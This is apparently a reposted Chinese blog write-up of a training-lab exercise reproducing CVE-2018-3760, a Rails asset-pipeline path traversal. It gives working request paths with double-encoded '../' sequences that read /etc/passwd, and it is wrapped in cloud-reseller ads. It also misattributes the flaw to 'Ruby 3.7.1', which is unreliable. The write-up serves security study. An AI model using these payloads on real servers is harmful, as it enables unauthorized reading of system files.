墨者学院 Ruby On Rails漏洞复现第一题(CVE-2018-3760)-CSDN博客

阿里云国内75折 回扣 微信号:monov8
阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6

打开 web 页面

发现是Ruby在Ruby 3.7.1和更低版本中存在由辅助解码引起的路径遍历漏洞。攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件。可以先检测一下是否有此漏洞

/assets/file:%2f%2f/etc/passwd

根据报错路劲构造 payload

/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

/assets/file:///usr/src/blog/app/assets/images/../../../../../../etc/passwd

阿里云国内75折 回扣 微信号:monov8
阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6
返回列表

上一篇:百度OCR 接口调用 提示 216101:param image not exist 问题解决-CSDN博客

下一篇:【MongoDB】索引 - 数组字段的多键索引-CSDN博客

“墨者学院 Ruby On Rails漏洞复现第一题(CVE-2018-3760)-CSDN博客” 的相关文章

Mysql 解析1年前 (2023-02-02)
python数据分析与可视化【思维导图】1年前 (2023-02-02)
php;//filter的介绍和应用1年前 (2023-02-02)
使用小黄鸟(HttpCanary)+模拟器(VMOS Pro)对手机APP进行抓包1年前 (2023-02-02)
Python基础之面向对象1年前 (2023-02-02)
思科防火墙应用NAT1年前 (2023-02-02)
SQLSERVER 事务日志的 LSN 到底是什么?1年前 (2023-02-02)
MySQL数据库 | SQL语句详解_mysql sql 数据库1年前 (2023-02-02)
20. 一秒一个Token甩到前台,吓死在座的各位爬虫工程师1年前 (2023-02-02)
微信小程序 | 小程序配置和架构1年前 (2023-02-02)

阿里云国际版